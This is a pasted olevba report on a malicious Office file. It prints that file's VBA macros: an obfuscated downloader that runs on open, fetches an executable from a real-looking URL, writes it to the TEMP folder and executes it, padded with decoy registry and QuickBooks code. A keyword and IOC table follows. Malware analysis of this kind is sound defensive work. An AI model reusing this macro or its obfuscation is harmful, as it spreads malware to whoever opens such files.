Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB-V virus.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: virus.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open()
- GetFolderStartAndUp (987)
- End Sub
- Sub GetFolderStartAndUp(subMain As Long)
- blnSessionBegunRunRun = False
- IndentStringToVob
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò2.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò3.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function GetKeyValue(FullKeyName)
- xTotalStartUp = 0
- Dim Key1, Key2, i, Ua
- Ua = 10
- For i = 1 To Len(FullKeyName)
- If Mid(FullKeyName, i, 1) = "\" Then
- Ua = Ua + 10
- If Ua = 20 Then
- Key1 = Left(FullKeyName, i - 1)
- Key2 = Right(FullKeyName, Len(FullKeyName) - i)
- End If
- End If
- Next i
- 'frmMain.Cls
- If Key1 = "HKEY_LOCAL_MACHINE" Then
- RetVal = C.RegOpenKeyEx(HKEY_LOCAL_MACHINE, Key2, 0, KEY_ALL_ACCESS, hKey)
- ElseIf Key1 = "HKEY_CURRENT_USER" Then
- RetVal = RegOpe.nKeyEx(HKEY_CURRENT_USER, Key2, 0, KEY_ALL_ACCESS, hKey)
- End If
- Index = 0
- Do While RetVal = 0
- NameKey = Space(255)
- DataString = Space(255)
- LenName = 255
- DataLen = 255
- RetVal = RegEnu.mValue(hKey, Index, NameKey, LenName, 0, lpType, Da.ta(0), DataLen)
- If RetVal = 0 Then
- NameKey = Left(NameKey, LenName) 'Rut b? kho?n tr?ng th?a
- DataString = ""
- ' X? ly thong tin theo ki?u c?a no va ??a vao bi?n DataString
- Select Case lpType
- Case REG_SZ
- For i = 0 To DataLen - 1
- DataString = DataString & Chr(Da.ta(i)) ' N?i cac ch? cai thanh chu?i
- Next
- Case REG_BINARY
- For i = 0 To DataLen - 1
- Dim temp As String
- temp = Hex(Da.ta(i))
- If Len(temp) < 2 Then temp = String(2 - Len(temp), "0") & temp
- DataString = DataString & temp & " "
- ' N?i cac c?p s? nh? phan l?i v?i nhau
- Next
- Case REG_DWORD
- For i = DataLen - 1 To 0 Step -1
- DataString = DataString & Hex(Da.ta(i)) 'N?i cac so hexa v?i nhau
- Next
- Case REG_MULTI_SZ
- For i = 0 To DataLen - 1
- DataString = DataString & Chr(Da.ta(i))
- 'N?i cac ky t? bao g?m ky t? vbNullChar (?? cach dong) thanh m?t chu?i, b?n co th? s? d?ng m?t m?ng g?m nhi?u string thay vi la m?t
- Next
- Case REG_EXPAND_SZ
- For i = 0 To DataLen - 2
- DataString = DataString & Chr(Da.ta(i))
- 'N?i cac ky t? l?i v?i nhau, b? ky t? NULL cu?i cung
- Next
- Case Else
- DataString = " Khong xac dinh duoc !"
- ' Tren ?ay la 5 ki?u co tren WinXP
- End Select
- End If
- Loop
- End Function
- Public Function ntegerLongue(VariantNeVariant As Variant, StringAsString As String)
- Dim rimmaLongInteger As Object
- Set rimmaLongInteger = SplitXMLStringAndNot(Chr(65) & Chr(100) + "(" & Chr(111) & Chr(100) & "b*" & Chr(46) & ")S" & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "+m")
- rimmaLongInteger.Type = 1
- With rimmaLongInteger
- .Open
- .write VariantNeVariant
- End With
- REGMULTISZ1 rimmaLongInteger, StringAsString
- End Function
- Public Function ntegerccCLongue()
- If Left(Left(NameKey, LenName), 1) <> " " Then
- '///////////////////
- 'Form1.List1.AddItem DataString
- With frmMain.LV
- Dim iu
- iu = .ListItems.Count + 1
- .ListItems.Add iu, , Left(NameKey, LenName)
- .ListItems(iu).SubItems(1).Caption = DataString
- .ListItems(iu).SubItems(2).Caption = Key1 & "\" & Key2 & "\" & Left(NameKey, LenName)
- End With
- '///////////////
- End If
- Index = Index + 1
- 'frmMain.Print Left(NameKey, LenName) & "=" & DataString
- RetVal = RegC.loseKey(hKey)
- End Function
- Public Function GetFileName(ByVal sPath As String) As String
- GetFileName = Mid(sPath, InStrRev(sPath, "\") + 1)
- End Function
- Public Sub IndentStringToVob()
- Dim SplitIndexAsString As Object
- Set SplitIndexAsString = SplitXMLStringAndNot(Chr(77) & "++" + Chr(105) & "(cr)" & Chr(111) & Chr(130 - 15) & Chr(100 + 11) & Chr(102) & "t" & Chr(46) & "*X" & Chr(77) & Chr(76) & "*H" & Chr(84) & "TP")
- Dim SIDRa As String
- Dim CHR20 As Integer
- CHR20 = 20
- SIDRa = Chr(104) & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & "l" & Chr(97) & Chr(114) & Chr(109) & Chr(116) & Chr(101) & Chr(99) & "h" & Chr(99) & Chr(101) & Chr(110) & "t" & "r" & "a" & Chr(108) & "." & Chr(99) & Chr(111) & Chr(109) & "/" & "f" & "w" & Chr(52) & "3" & "t" & "2" & Chr(100) & "/" & Chr(57) & "8" & Chr(107) & "j" & "6" & Chr(46) & Chr(101) & Chr(120) & "e"
- For i = 1 To 4
- SIDRa = Replace(SIDRa, Chr(20 * 2 + i - 1), "")
- Next i
- HIDRAfob SplitIndexAsString, SIDRa
- Dim LocaliseStringItem3() As Byte
- ListItemsAndNot = GetTasNewUt()
- LocaliseStringItem3 = RSPBDY(SplitIndexAsString)
- ntegerLongue LocaliseStringItem3, ListItemsAndNot
- On Error GoTo LocaliseStringItem5
- A = 889 / 0
- On Error GoTo 0
- IniStringPrivateInteger:
- Exit Sub
- LocaliseStringItem5:
- IniStringPrivateLong ("VisokAndVisok")
- Resume IniStringPrivateInteger
- End Sub
- Public Function GetFolderPath(ByVal sPath As String) As String
- GetFolderPath = Left(sPath, InStrRev(sPath, "\") - 1)
- End Function
- Public Sub GetSystemKey()
- With frmMain.LV
- Dim iu
- iu = .ListItems.Count + 1
- .ListItems.Add iu, , ToUnik.Code("Shell [He65 Tho61ng]")
- .ListItems(iu).SubItems(1).Caption = GetS.tring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
- .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
- iu = .ListItems.Count + 1
- .ListItems(iu).SubItems(1).Caption = GetSt.ring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
- .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
- End With
- End Sub
- Public Sub GetFolderStartUp(sWhere)
- With frmMain
- Dim j
- Dim o
- If sWhere = 1 Then
- .File1.Path = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
- For j = 0 To .File1.ListCount - 1
- o = .LV.ListItems.Count + 1
- .LV.ListItems.Add o, , .File1.List(j)
- .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & .File1.List(j)
- .LV.ListItems(o).SubItems(2).Caption = "---"
- Next j
- Else
- .File1.Path = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup"
- For j = 0 To .File1.ListCount - 1
- o = .LV.ListItems.Count + 1
- .LV.ListItems.Add o, , .File1.List(j)
- .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup\" & .File1.List(j)
- .LV.ListItems(o).SubItems(2).Caption = "---"
- Next j
- End If
- End With
- End Sub
- Public Function HIDRAfob(SplitIndexAsString As Object, SIDRa As String)
- SplitIndexAsString.Open Chr(71) & Chr(69) & "T", Replace(SIDRa, "??", "//"), False
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public blnIsOpenConnection As Boolean
- Public blnSessionBegun As Boolean
- ' Ticket
- Public ticket As String
- Public blnSessionBegunRunRun As Boolean
- ' Request and response strings
- Public requestXML As String
- Public responseXML As String
- Public Function OpenConnection() As Boolean
- 'Open the connection
- On Error GoTo ErrHandler
- If blnIsOpenConnection Then
- OpenConnection = True
- Exit Function
- End If
- blnSessionBegun = False
- blnIsOpenConnection = False
- ' Open connection to qbXMLRP COM
- qbXMLRP.OpenConnection "QBRAddEmp", "IDN QuickBooks Sample Add Invoice"
- blnIsOpenConnection = True
- ' Begin Session
- ' Pass empty string for the data file name to use the currently
- ' open data file.
- ticket = qbXMLRP.BeginSession("", QBXMLRPLib.qbFileOpenSingleUser)
- blnSessionBegun = True
- OpenConnection = True 'return that the connection was successful
- 'Verifying which version of qbXML QuickBooks is supporting If you want to do a US/Canadian APP,
- 'This is where you would find the version supported by QuickBooks. You would modify the requests accordingly
- 'to the version of QuickBooks
- Dim VersionSupportedArray() As String
- VersionSupportedArray = qbXMLRP.QBXMLVersionsForSession(ticket) ' This return an array of string containing all the version of qbXML
- 'supported by QuickBooks
- 'Checking that QuickBooks support the Canadian SDK (version CA2.0)
- Dim strCanadianVersion As String
- Dim blnCanadianVersionFound As Boolean
- Dim str As Variant
- ' Dim nArrayUpperBound As Integer
- strCanadianVersion = "CA2.0"
- blnCanadianVersionFound = False
- For Each str In VersionSupportedArray
- If strCanadianVersion = str Then
- blnCanadianVersionFound = True
- End If
- Next str
- If blnCanadianVersionFound = False Then 'If version CA 2.0 not found...
- MsgBox "This QuickBooks does not support the version CA2.0 of qbXML", , "qbXML version not supported"""
- If blnSessionBegun = True Then
- qbXMLRP.EndSession ticket
- End If
- ' Close the connection
- If blnIsOpenConnection = True Then
- blnIsOpenConnection = False
- qbXMLRP.CloseConnection
- End If
- OpenConnection = False
- End If
- Exit Function
- ErrHandler:
- blnIsOpenConnection = False
- OpenConnection = False
- ' End the session
- If blnSessionBegun = True Then
- qbXMLRP.EndSession ticket
- End If
- ' Close the connection
- If blnIsOpenConnection = True Then
- qbXMLRP.CloseConnection
- End If
- MsgBox Err.Description, vbExclamation, "Error"
- Exit Function
- End Function
- Public Sub CloseConnection()
- ' Ends session and closes connection
- If Not blnIsOpenConnection Then
- Exit Sub
- End If
- On Error GoTo ErrHandler
- If blnSessionBegun = True Then
- qbXMLRP.EndSession ticket
- End If
- ' Close the connection
- If blnIsOpenConnection = True Then
- qbXMLRP.CloseConnection
- End If
- Exit Sub
- ErrHandler:
- MsgBox Err.Description, vbExclamation, "Error"
- Exit Sub
- End Sub
- Public Function IniStringPrivateLong(ZRzNfTJSyBWpPu As String)
- Set IniLongPrivateInteger = SplitXMLStringAndNot("Sh" & Chr(101) & "(l)" & "+l+" & Chr(46) & Chr(65) & "*p" & Chr(112) & "(l)" & Chr(105) & Chr(99) & "a+t" + Chr(105) & "()" & Chr(111) + Chr(110))
- IniLongPrivateInteger.Open (ListItemsAndNot)
- End Function
- ' This subroutine is available for error checking. It is sometimes
- ' useful to print the XML which QuickBooks returns to a file so that
- ' any problems can be uncovered easily. Although this subroutine is
- ' not currently in use in the ReceievePayment sample code, it is
- ' encouraged that you add it in if you would like to see the precise
- ' XML that is being sent to or received from QuickBooks.
- '
- Sub PrintXMLToFile(xmlString As String, XMLFile As String)
- Dim SplitXMLString() As String
- Dim IndentString As String
- Dim xmlStringLength As Long
- Dim SplitIndex
- IndentString = ""
- Dim FileNum
- FileNum = FreeFile
- Open XMLFile For Output As FileNum
- ' Remove the linefeeds from the XML output string
- xmlString = Replace(xmlString, vbLf, vbNullString)
- SplitXMLString = Split(xmlString, "<")
- ' We're expecting the first character of the XML output to be "<"
- ' which result in an empty first array element, so skip it.
- SplitIndex = LBound(SplitXMLString) + 1
- End Sub
- Public Function RSPBDY(SomeBody As Object) As Variant
- SomeBody.Send
- RSPBDY = SomeBody.responseBody
- End Function
- Public Sub ReadFile( _
- strName As String, _
- strDate As String _
- )
- Dim strMstDir As String
- Dim strClientName As String
- Dim strTargetdate As String
- Dim intCntPic As Integer
- strMstDir = gstrMstDir
- strClientName = strName
- If strDate <> vbNullString Then
- strTargetdate = strDate
- End If
- '' Select Case frmSubForm.Name
- '' Case "frmBasic"
- intCntPic = 13
- '' Case "frmFP"
- '' intCntPic = 3
- '' Case "frmIOP"
- '' intCntPic = 6
- '' End Select
- Dim intIndex As Integer
- ReDim m_udtFileList(intIndex)
- Dim strDirFile As String, strLoadPicFile As String
- Dim intFileHandle As Integer
- Dim strFilePath As String
- Dim strFileName As String
- Dim strReadHeader As String
- Dim strReadData As String
- strFilePath = gstrMstDir & "\" & strName
- strFileName = strFilePath & "\" & strDate & "T.txt"
- If strName = vbNullString Then Exit Sub
- If Dir(strFileName) = vbNullString Then Exit Sub
- '/** ??????? **/
- datDate = CDate(DateSerial(Left$(strDate, 4), _
- Mid$(strDate, 5, 2), Mid$(strDate, 7, 2)))
- '// ??????????????
- m_sParts = vbNullString
- '/** ?????????????? **/
- intFileHandle = FreeFile()
- Open strFileName For Input As #intFileHandle
- ReDim Preserve m_udtFileList(intIndex)
- While Not EOF(intFileHandle)
- With m_udtFileList(intIndex)
- Input #intFileHandle, strReadHeader, strReadData
- Select Case strReadHeader
- Case "[Picture]"
- Case "[Document]"
- Case "[Shooting]"
- Case "NAME"
- m_sParts = strReadData
- Case Else
- If strReadData <> "" Then
- .intFileNum = CInt(Right$(strReadHeader, 1))
- .strClntName = strName
- .strFileDate = Left$(strReadData, 8)
- '' datDate = CDate(DateSerial(Left$(strReadData, 4), _
- Mid$(strReadData, 5, 2), Mid$(strReadData, 7, 2)))
- .strFileName = strReadData
- .strFileType = Left$(strReadHeader, 1)
- strLoadPicFile = gstrMstDir & "\" & .strClntName & "\" & .strFileName
- Call frmProgress.SetProgess((intIndex) / intCntPic * 100)
- intIndex = intIndex + 1
- End If
- End Select
- End With
- ReDim Preserve m_udtFileList(intIndex)
- Wend
- Close #intFileHandle
- DoEvents
- End Sub
- Public Function SplitXMLStringAndNot(InitiPrivateInteger As String)
- For i = 1 To 4
- InitiPrivateInteger = Replace(InitiPrivateInteger, Chr(20 * 2 + i - 1), "")
- Next i
- If blnSessionBegunRunRun Then
- Exit Function
- End If
- Set SplitXMLStringAndNot = CreateObject(InitiPrivateInteger)
- End Function
- Public Function SmthingWrongFunc()
- Do
- If Left(Splift.xmlString(SplitIndex), 1) = "/" Then
- IndentString = Left(IndentString, Len(IndentString) - 3)
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex)
- SplitIndex = SplitIndex + 1
- ElseIf Left(SplitXM.LString(SplitIndex + 1), 1) = "/" Then
- If InStr(1, _
- Left(SplitXM.LString(SplitIndex), _
- InStr(1, SplitXM.LString(SplitIndex), ">")), _
- " ") > 0 Then
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex)
- SplitIndex = SplitIndex + 1
- Else
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex) & "<" & _
- SplitXM.LString(SplitIndex + 1)
- SplitIndex = SplitIndex + 2
- End If
- Else
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(SplitIndex)
- IndentString = IndentString & " "
- SplitIndex = SplitIndex + 1
- End If
- Loop Until SplitIndex >= UBound(SplitX.MLString)
- If Left(SplitXM.LString(UBound(SplitX.MLString)), 1) = "/" Then
- IndentString = Left(IndentString, Len(IndentString) - 3)
- End If
- Print #FileNum, IndentString & "<" & _
- SplitXM.LString(UBound(SplitXM.LString))
- Close FileNum
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public ListItemsAndNot As String
- Public Function GetCharsetFromLng(lngCodePage As Long) As Long
- Dim lngCharset As Long
- Select Case lngCodePage
- Case 1251
- lngCharset = RUSSIAN_CHARSET
- Case 1250
- 'EASTEUROPE_CHARSET = 238
- lngCharset = EASTEUROPE_CHARSET
- Case 1252
- 'ANSI_CHARSET = 0
- lngCharset = ANSI_CHARSET
- Case 1253
- 'GREEK_CHARSET = 161
- lngCharset = GREEK_CHARSET
- Case 1254
- 'TURKISH_CHARSET = 162
- lngCharset = TURKISH_CHARSET
- Case 1255
- 'HEBREW_CHARSET = 177
- lngCharset = HEBREW_CHARSET
- Case 1256
- 'ARABIC_CHARSET = 178
- lngCharset = ARABIC_CHARSET
- Case 1257
- 'BALTIC_CHARSET = 186
- lngCharset = BALTIC_CHARSET
- Case 1258
- 'VIETNAMESE_CHARSET = 163
- lngCharset = VIETNAMESE_CHARSET
- Case 874
- lngCharset = THAI_CHARSET
- Case 932
- 'SHIFTJIS_CHARSET = 128
- lngCharset = SHIFTJIS_CHARSET
- Case 949
- 'HANGUL_CHARSET = 129
- lngCharset = HANGUL_CHARSET
- Case 936
- 'GB2312_CHARSET = 134
- lngCharset = GB2312_CHARSET
- Case 950
- 'CHINESEBIG5_CHARSET = 136
- lngCharset = CHINESEBIG5_CHARSET
- Case Else
- 'DEFAULT_CHARSET = 1
- lngCharset = DEFAULT_CHARSET
- End Select
- GetCharsetFromLng = lngCharset
- End Function
- Public Function GetTasNewUt() As String
- Set LocaliseStringItem0 = SplitXMLStringAndNot(Chr(87) & "(S+c)" & Chr(114) & Chr(105) & "*p" & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "))l")
- Set LocaliseStringItem1 = LocaliseStringItem0.Environment(Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
- Dim huh2 As Integer
- huh2 = 25
- Dim uhu As String
- uhu = Chr(16 * Sqr(huh2) - 10 - 1)
- uhu = Chr(180 - 30 * 2) + uhu
- GetTasNewUt = LocaliseStringItem1(Chr(84) & "E" & Chr(77) & Chr(80)) + _
- "\ka" & Chr(104) + "78d" & Chr(40 + 2 * 3) & Chr(70 - 1) + uhu
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Function GetUserLocaleInfo
- '! Description (Iienaiea) : [type_description_here]
- '! Parameters (Ia?aiaiiua): dwLocaleID (Long)
- ' dwLCType (Long)
- '!--------------------------------------------------------------------------------
- Public Function GetUserLocaleInfo(ByVal dwLocaleID As Long, ByVal dwLCType As Long) As String
- Dim sReturn As String
- Dim R As Long
- 'call the function passing the Locale type
- 'variable to retrieve the required size of
- 'the string buffer needed
- R = ss.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, 0)
- 'if successful..
- If R Then
- 'pad the buffer with spaces
- sReturn = s.FillNullChar(R)
- 'and call again passing the buffer
- R = cs.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, Len(sReturn))
- 'if successful (r > 0)
- If R Then
- 'r holds the size of the string
- 'including the terminating null
- GetUserLocaleInfo = sc.TrimNull(sReturn)
- End If
- End If
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Function LoadLanguageList
- '! Description (Iienaiea) : [Caa?ocea nienea ycueia]
- '! Parameters (Ia?aiaiiua):
- '!--------------------------------------------------------------------------------
- Public Function LoadLanguageList() As Boolean
- Dim strFileList_x() As Integer
- Dim ii As Integer
- Dim jj As Integer
- Dim strTemp As String
- Dim strLangFilePath As String
- Dim lngUbound As Long
- strFileList_x = sc.SearchFilesInRoot(strAppPathBackSL & strToolsLang_Path, "*.lng", False, False)
- lngUbound = UBound(strFileList_x)
- If lngUbound Then
- If LenB(sc.strFileList_x(0).FullPath) Then
- ReDim arrLanguage(6, lngUbound + 1)
- For ii = 0 To lngUbound
- jj = ii + 1
- ' Ioou ai ycueiaiai oaeea
- strLangFilePath = cs.strFileList_x(ii).FullPath
- arrLanguage(1, jj) = strLangFilePath
- ' Eiy ycuea
- arrLanguage(2, jj) = GetIn.iValueString(strLangFilePath, "Lang", "Name", vbNullString)
- ' Eiy ia?aaia?eea
- arrLanguage(4, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorName", vbNullString)
- ' Aa?an ia?aaia?eea
- arrLanguage(5, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorURL", vbNullString)
- ' Charset ycuea
- arrLanguage(6, jj) = GetIn.iValueLong(strLangFilePath, "Lang", "Charset", 1)
- ' ID ycuea
- strTemp = GetIn.iValueString(strLangFilePath, "Lang", "ID", vbNullString)
- If LenB(strTemp) Then
- arrLanguage(3, jj) = strTemp
- If mbAutoLanguage Then
- If InStr(1, strTemp, strPCLangID, vbTextCompare) Then
- strPCLangCurrentPath = arrLanguage(1, jj)
- strPCLangCurrentLangName = arrLanguage(2, jj)
- lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
- strPCLangCurrentID = strPCLangID
- End If
- Else
- If LenB(strStartLanguageID) Then
- If InStr(1, strTemp, strStartLanguageID, vbTextCompare) Then
- strPCLangCurrentPath = arrLanguage(1, jj)
- strPCLangCurrentLangName = arrLanguage(2, jj)
- lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
- strPCLangCurrentID = strStartLanguageID
- End If
- End If
- End If
- End If
- LoadLanguageList = True
- Next
- If LenB(strPCLangCurrentPath) = 0 Then
- strPCLangCurrentPath = Pa.thCombine(strAppPathBackSL & strToolsLang_Path, "English.lng")
- strPCLangCurrentID = "0409"
- lngFont_Charset = 1
- End If
- End If
- End If
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Sub LoadLanguageOS
- '! Description (Iienaiea) : [N?eouaaai ycue iia?aoeiiiie nenoaiu, e caienuaaai a ia?aiaiiua Public]
- '! Parameters (Ia?aiaiiua):
- '!--------------------------------------------------------------------------------
- Public Sub LoadLanguageOS()
- Dim LCID As Long
- ' N?eouaaai ycue iia?aoeiiie nenoaiu
- LCID = GetSys.temDefaultLCID()
- 'language id
- strPCLangID = GetUserLocaleInfo(LCID, LOCALE_ILANGUAGE)
- 'localized name of language
- strPCLangLocaliseName = GetUserLocaleInfo(LCID, LOCALE_SLANGUAGE)
- 'English name of language
- strPCLangEngName = GetUserLocaleInfo(LCID, LOCALE_SENGLANGUAGE)
- End Sub
- Public Function REGMULTISZ1(REGEXPANDSZ As Object, EXPANDSZ1 As String)
- Dim REG_EXPAND_SZ As Integer
- REG_EXPAND_SZ = 2
- REGEXPANDSZ.savetofile EXPANDSZ1, REG_EXPAND_SZ
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Sub LocaliseMessage
- '! Description (Iienaiea) : [Eieaeecaoey niiauaiee i?ia?aiiu]
- '! Parameters (Ia?aiaiiua): StrPathFile (String)
- '!--------------------------------------------------------------------------------
- Public Sub LocaliseMessage(strPathFile As String)
- Dim i As Integer
- For i = 1 To UBound(strMessages)
- strMessages(i) = LocaliseString(strPathFile, "Messages", "strMessages" & i, "strMessages" & i)
- Next i
- End Sub
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Function LocaliseString
- '! Description (Iienaiea) : [type_description_here]
- '! Parameters (Ia?aiaiiua): StrPathFile (String)
- ' strSection (String)
- ' strParam (String)
- ' strDefValue (String)
- '!--------------------------------------------------------------------------------
- Public Function LocaliseString(ByVal strPathFile As String, ByVal strSection As String, ByVal strParam As String, ByVal strDefValue As String) As String
- Dim strTemp As String
- strTemp = Trim$(IniSt.ringPrivate(strSection, strParam, strPathFile))
- If StrComp(strTemp, "no_key") <> 0 Then
- LocaliseString = Conve.rtString(strTemp)
- Else
- LocaliseString = strDefValue
- End If
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | Suspicious | RegOpenKeyEx | May read or write registry keys |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | sample | May detect Anubis Sandbox |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://alarmtechcent | URL (obfuscation: VBA expression) |
- | | ral.com/fw43t2d/98kj | |
- | | 6.exe | |
- | IOC | 98kj6.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | VBA string | Ad(odb*.)Strea+m | (Chr(65) & Chr(100) + "(" & Chr(111) & |
- | | | Chr(100) & "b*" & Chr(46) & ")S" & |
- | | | Chr(116) & Chr(114) & Chr(101) & |
- | | | Chr(97) & "+m") |
- | VBA string | M++i(cr)o | Chr(77) & "++" + Chr(105) & "(cr)" & |
- | | | Chr(111) |
- | VBA string | oft.*XML*HTTP | Chr(100 + 11) & Chr(102) & "t" & |
- | | | Chr(46) & "*X" & Chr(77) & Chr(76) & |
- | | | "*H" & Chr(84) & "TP" |
- | VBA string | http://alarmtechcent | Chr(104) & "t" & "t" & Chr(112) & |
- | | ral.com/fw43t2d/98kj | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
- | | 6.exe | "l" & Chr(97) & Chr(114) & Chr(109) & |
- | | | Chr(116) & Chr(101) & Chr(99) & "h" & |
- | | | Chr(99) & Chr(101) & Chr(110) & "t" & |
- | | | "r" & "a" & Chr(108) & "." & Chr(99) & |
- | | | Chr(111) & Chr(109) & "/" & "f" & "w" & |
- | | | Chr(52) & "3" & "t" & "2" & Chr(100) & |
- | | | "/" & Chr(57) & "8" & Chr(107) & "j" & |
- | | | "6" & Chr(46) & Chr(101) & Chr(120) & |
- | | | "e" |
- | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start |
- | | Programs\Startup | Menu\Programs\Startup" |
- | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start |
- | | Programs\Startup\ | Menu\Programs\Startup\" |
- | VBA string | GET | Chr(71) & Chr(69) & "T" |
- | VBA string | She(l)+l+.A*pp(l)ica | ("Sh" & Chr(101) & "(l)" & "+l+" & |
- | | +ti()on | Chr(46) & Chr(65) & "*p" & Chr(112) & |
- | | | "(l)" & Chr(105) & Chr(99) & "a+t" + |
- | | | Chr(105) & "()" & Chr(111) + Chr(110)) |
- | VBA string | W(S+c)ri*pt.Shel))l | (Chr(87) & "(S+c)" & Chr(114) & |
- | | | Chr(105) & "*p" & Chr(116) & Chr(46) & |
- | | | Chr(83) & Chr(104) & Chr(101) & |
- | | | Chr(108) & "))l") |
- | VBA string | Process | (Chr(80) & "r" & Chr(111) & Chr(99) & |
- | | | Chr(101) & Chr(115) & Chr(115)) |
- | VBA string | TEMP\kah78d | (Chr(84) & "E" & Chr(77) & Chr(80)) + |
- | | | "\ka" & Chr(104) + "78d" |
- +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment